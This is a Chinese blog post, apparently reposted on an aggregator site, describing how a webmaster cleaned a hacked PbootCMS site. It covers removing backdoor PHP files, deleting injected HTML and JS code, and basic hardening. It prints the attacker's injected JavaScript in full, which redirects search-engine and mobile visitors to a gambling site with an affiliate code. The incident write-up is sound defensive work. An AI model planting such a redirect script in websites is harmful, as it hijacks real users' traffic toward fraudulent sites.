我的编程空间,编程开发者的网络收藏夹
学习永远不晚

pbootcms被黑木马问题(3)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

pbootcms被黑木马问题(3)

昨天经过同事告知发现了很早之间做的几个企业官方都中木马了,然后看了一下木马情况,跟之间的两次都有所不同,这里记录一下新的木马的清理过程,有遇到的朋友可以借鉴一下。(之前有做过一些防止批量扫站的措施,因为嫌麻烦就没有给这些网站上进行修改)

1)网站被黑以后的表现形式:

就跟上面显示的一样,被黑以后对方会在首页进行插入一些对方的信息,这里是关于一个体育的灰网的站点,而且这里对方还做了一个小的识别,那就是你直接输入网址或者通过收藏夹进入的都是正常的,但是通过搜索引擎点击进入的就会进行跳转到对方的网站.这里对方使用的是js的方式进行跳转的,后面我们会说。

2)如何进行清理

  1. 下载一个d盾,使用D盾进行扫描php文件(不知道其他类型的可不可以,我这边只是能扫描php后缀的)

  1. 通过扫描我们可以看到关于PHP后缀的文件的一些涉及危险操作的文件,如果你的pb没有进行过二开,也没有使用cms88或者其他人的一些含有加密授权的插件的话,那么除了Kernel.php这个官方文件以外其他的文件都是对方上传的后门文件了,我们要做的就是在d盾中通过右键选择删除的方式进行删除这些后门文件。

  1. 操作完d盾以后我们还需要寻找对方留下的js文件以及html文件,对方会把我们根目录下的index.php给修改的同时还会上传一个m.html类似名称的html文件,这里我们可以根据前面我们清理的后台文件的上传时间得知哪些文件是同一天被修改的,那么我们也就需要删除根目录下的这些文件。删除以后看我们的首页引用的js文件路径是哪里,然后找到对应的目录,看看这些js文件有没有被修改。小编这里遇到的情况都是会有两个js文件被对方加入了两段代码,分别在js文件的开头与结尾,把这个也删除就好了(删除对方加入的代码,不是删除整个js文件,如果你有本地备份直接替换也可以)。

3)针对pb做一些简单的防止被批量扫码的设置。

1.数据库中插入系统的名称,不进行默认显示pbootcms系统的字样

2.把admin.php的文件命名为其他名称,比如xxx.php,这样我们登录的时候就是http://www.371302.cn/xxx.php 的路径了。也能避免一些被扫的风险。

4)说一下对方设置的js跳转的方式,主要是在https://www.xxx.com/bb.js 这个文件中(有时候会放到其他地方,不过js代码是一致的)

在这里打开以后可以看到下面的方法,这里猜想agent_code=5306274'应该就是对方的邀请码之类的或者用于计算佣金的地方。根据被导入到目标网站的次数计算佣金把。

var sp_regexps =  /.(yahoo|google|baidu|soso|sogou|bing|sou|so|360|haosou|youdao|sooule|easou|aliyun|sina|jike|Yisou|uc|sm)./gi;var sp_whereis = window.location.referrer;try {  sp_whereis = top.document.referrer;} catch (e) {}try {  sp_whereis = window.parent.document.referrer;} catch (e) {}var sp_domains = window.location.host;try {  sp_domains = top.document.domain;} catch (e) {}try {  sp_domains = window.parent.document.domain;} catch (e) {}if (sp_regexps.test(sp_whereis)) {  window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';  parent.window.opener.location = 'https://www.xxx.com:9152/?agent_code=5306274';}function browserRedirect() {  var sUserAgent = navigator.userAgent.toLowerCase();  var bIsIpad = sUserAgent.match(/ipad/i) == 'ipad';  var bIsIphoneOs = sUserAgent.match(/iphone os/i) == 'iphone os';  var bIsMidp = sUserAgent.match(/midp/i) == 'midp';  var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == 'rv:1.2.3.4';  var bIsAndroid = sUserAgent.match(/android/i) == 'android';  var bIsCE = sUserAgent.match(/windows ce/i) == 'windows ce';  var bIsWM = sUserAgent.match(/windows mobile/i) == 'windows mobile';  if (!(bIsIphoneOs || bIsMidp || bIsAndroid || bIsCE || bIsWM)) {  } else {    window.location.href = 'https://www.xxx.com:9152/?agent_code=5306274';  }}browserRedirect();var s=document.referrer;var str=window.location.href;if(s.indexOf("b"+"ai"+"du")>0 || s.indexOf("s"+"ogou")>0|| s.indexOf("s"+"m")>0 || s.indexOf("360")>0 || s.indexOf("s"+"o")>0|| s.indexOf("go"+"o"+"gle")>0 || s.indexOf("bing")>0  || s.indexOf("youdao")>0 )window.location.href="https://www.xxx.com:9152/?agent_code=5306274";

以上便是临沂建站分享的有关本次挂马的处理过程,分别从被黑以后的表现形式以及处理过程还有最后的简单防批量扫码三个方面进行处理。最后不得不说的就是人家确实牛逼,15号被挂的马,17号的时候百度上已经被更新成对方的信息了,要是我们自己修改一次信息没有个一个月的时间是更新不出来的。

来源地址:https://blog.csdn.net/u014401637/article/details/129118032

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

pbootcms被黑木马问题(3)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

如何应对亚马逊云服务器被黑客入侵的问题

1.立即停止服务器如果你发现自己的亚马逊云服务器被黑客入侵,第一步是立即停止服务器。这可以防止黑客继续访问你的服务器并进一步破坏你的数据。2.收集证据在停止服务器之前,你应该尽可能多地收集证据。这包括查看服务器日志、检查文件修改时间戳、查看网络连接等。这些证据可以帮助你确定黑客入侵的方式和时间,并帮助你更好地保护你的服务器。3.修复漏洞一旦你确定了黑客入侵的方式,你需要立即修复漏洞。这可能包括更新软件、...
2023-10-27

如何解决阿里云服务器被黑客黑了的问题

1.立即断开与服务器的连接一旦发现阿里云服务器被黑客黑了,第一步是立即断开与服务器的连接。这可以通过关闭远程连接或者直接断电来实现。这样可以阻止黑客继续对服务器进行攻击,同时也可以减少进一步的损害。2.通知阿里云技术支持在断开与服务器的连接后,立即通知阿里云的技术支持团队。他们将能够提供专业的帮助和指导,以帮助您解决服
2023-10-27

云服务器被黑客入侵怎么解决问题

云服务器被黑客入侵的原因通常是由于安全漏洞或者恶意软件。解决方法如下:安装反病毒软件:使用云服务商提供的产品,确保安装杀毒软件和防火墙,可以保护您的设备免受恶意软件的攻击。更新操作系统和应用程序:定期更新操作系统和应用程序,以修复漏洞和改进安全性,并防止攻击。使用防火墙:使用防火墙可以帮助阻止非法访问和攻击,防止云服务器被黑客入侵。更新应用程序:更新应用程序,以确保其具有更高的安全性和可信性,并防止未知应用程...
2023-10-27

如何解决网站中了木马无法删除的问题

本篇内容介绍了“如何解决网站中了木马无法删除的问题”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!  首先要找到木马!  我们使用D盾扫描了一
2023-06-10

防止Dedecms被挂马的安全问题分析

可是令很多站长头疼的是,自己用dedecms建的站经常被人莫名其妙的挂马,造成满页黑链,令人气愤;更为严重的是,还有可能被搜索引擎惩罚,于是辛辛苦苦建立的站,眼睁睁的看它权重下降,收录减少,甚至被K。其实,我是草根在被入侵几站与主动入侵他站
2022-06-12

云服务器被黑客入侵勒索怎么解决问题

及时更新防护措施:使用反病毒软件、补丁、安全审计等工具对服务器进行定期检查,及时更新补丁,确保系统安全性。关闭入侵账户:立即关闭入侵账户,并杀出入侵工具,以预防此问题。增加密码复杂度:为服务器设置复杂密码,并建议使用字母、数字和符号混合的复杂密码。增加安全性:在网站上添加安全链接,使用户可以通过网站进行访问。网站应使用HTTPS协议,以防止黑客利用HTTP入侵服务器。定期备份数据:定期备份服务器数...
2023-10-27

阿里云服务器被黑客攻击怎么解决问题

1.确认服务器是否被攻击如果你怀疑自己的阿里云服务器被黑客攻击了,首先需要确认一下是否真的被攻击了。你可以通过以下方式来确认:检查服务器的日志文件,看看是否有异常的登录记录或者其他异常操作记录。检查服务器的网络流量,看看是否有异常的网络流量。检查服务器的系统资源使用情况,看看是否有异常的资源占用情况。如果你确认了服务器被攻击了,那么接下来需要采取一些措施来解决问题。2.立即断开服务器与外网的连接如果你...
2023-10-27

如何解除阿里云服务器被黑客控制的问题

1.立即断开与服务器的连接一旦发现阿里云服务器被黑客控制,第一步是立即断开与服务器的连接。这可以通过关闭远程连接工具(如SSH)或者直接关闭服务器来实现。这样可以阻止黑客继续对服务器进行恶意操作。2.更改管理员密码黑客可能通过猜测或者破解管理员密码来获取对服务器的控制权。因此,更改管理员密码是解除黑客控制的重要一步。确
2023-10-27

亚马逊服务器被攻击怎么解决问题

切换高防IP或添加CDN,将流量攻击清洗后保留正常流量转到我们正常服务器IP。调整策略,限制对服务器的访问频率和带宽,以避免过多的攻击流量进入服务器。更新安全补丁和防护软件,以修复已知漏洞,减少被攻击的风险。定期备份数据,以防止数据丢失或被攻击时无法恢复。加强员工安全意识培训,加强安全防范,防止未经授权的访问和操作。总之,对于亚马逊的服务器被攻击,需要及时采取措施,避免攻击对业务造成损失。
2023-10-27

如何解决网站被黑注入博彩色情页面的问题

本篇内容主要讲解“如何解决网站被黑注入博彩色情页面的问题”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“如何解决网站被黑注入博彩色情页面的问题”吧!欧洲杯激战正酣,又到了博彩利益集团疯狂入侵正常站
2023-06-10

亚马逊服务器被占用怎么办解决问题

检查并清理缓存:当您访问亚马逊站点时,您的缓存可能会被其他人读取或更新,这可能会导致您的网站或库存数据被错误地显示。确保您的缓存中没有任何未处理的数据,并清除浏览器缓存和其他临时文件。检查并修复DNS错误:如果您的服务器位于国外,您可能需要检查您的DNS设置,确保它正确。如果您使用的是第三方DNS服务,请确保您的DNS设置正确。检查并修复SKU设置错误:如果您的库存数量很大,您可能需要检查您的SK...
2023-10-27

亚马逊服务器被攻击怎么解决的问题

切换高防IP:通过切换高防IP,可以有效地减少攻击流量的攻击源,防止被封IP。可以在不同的地区和国家之间进行切换。添加CDN:添加CDN可以帮助缓解网站的访问压力,减少攻击流量的攻击源,从而有效地保护服务器安全。更新软件和系统:及时更新软件和系统可以修复漏洞,提高服务器安全性。定期备份数据:定期备份数据可以保证在服务器遭受攻击时,可以恢复数据,避免数据丢失。建立访问权限控制:建立访问权限控制可以有...
2023-10-27

亚马逊服务器被终止了怎么解决问题

硬件故障:亚马逊服务器可能出现硬件故障,如电源供应不足、硬盘故障、内存故障等。网络故障:亚马逊服务器可能出现网络故障,例如网络连接超时、网络中断或DNS解析错误等。软件问题:亚马逊服务器可能出现软件故障,例如软件更新失败、软件权限设置错误等。操作问题:亚马逊服务器可能出现操作问题,例如系统权限设置错误、账户权限设置错误、账户被禁用等。针对不同的问题,可以采取不同的解决方案:检查硬件是否存在故障,如...
2023-10-27

互联网中如何解决网站被挂马的问题

这篇文章主要介绍了互联网中如何解决网站被挂马的问题,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。  网站服务器和空间被入侵,让人都很纠结这种事情,自己辛辛苦苦的运行半年的网站
2023-06-10

亚马逊服务器被攻击怎么解决的问题呢

使用强密码和多因素身份验证:确保您的账户密码足够复杂,包括字母、数字和符号,并使用多因素身份验证来验证您的身份。定期更新您的安全软件:确保您的操作系统和应用程序都有更新,以保护您的服务器免受网络攻击。限制对您的网络访问:在访问您的服务器之前,确保您的网络已经得到安全控制。限制对您的网络的访问,可以减少被攻击的风险。安装防火墙:在您的服务器上安装防火墙,可以帮助您阻止恶意流量、黑客入侵和其他网络攻击...
2023-10-27

如何解决租用亚马逊服务器被攻击的问题

1.确认攻击类型和范围首先,你需要确认你的亚马逊服务器确实受到了攻击。观察服务器的异常行为,如网络延迟、服务中断、异常流量等。同时,使用安全工具和日志分析来检测和识别攻击类型和范围。2.加强服务器安全为了应对攻击,你可以采取以下措施来加强服务器的安全性:-更新和修补服务器操作系统和应用程序,确保安装了最新的安全补丁。-配置防火墙和入侵检测系统(IDS)来监控和阻止恶意流量。-使用强密码和多因素身份验证来保...
2023-10-27

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录